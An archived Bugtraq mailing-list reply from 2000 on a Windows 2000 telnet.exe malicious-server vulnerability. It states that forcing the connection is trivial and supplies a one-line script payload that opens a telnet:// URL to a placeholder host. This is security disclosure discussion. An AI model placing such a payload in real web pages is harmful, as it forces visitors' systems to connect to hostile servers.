[16766] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Tim Hollebeek)
Thu Sep 14 12:48:46 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <4BC10D47D7ACD3119FA800104B1F88363E7DDE@exchange.rstcorp.com>
Date: Thu, 14 Sep 2000 11:18:21 -0400
Reply-To: Tim Hollebeek <tim@RSTCORP.COM>
From: Tim Hollebeek <tim@RSTCORP.COM>
X-To: monti <monti@USHOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
> During my tests I discovered that IE associates the telnet://
> URL with the vulnerable telnet.exe. This opens up several
> possible ways to force a user into connecting to you with a
> malicious HTLM web page, email message, and so on. I would
> speculate that it might also be possible to force this to
> happen without user intervention with javascript/activeX/java
> or really creative HTLM.
In fact it's trivial to do so. Use:
<script>window.open("telnet://some.host.here")</script>
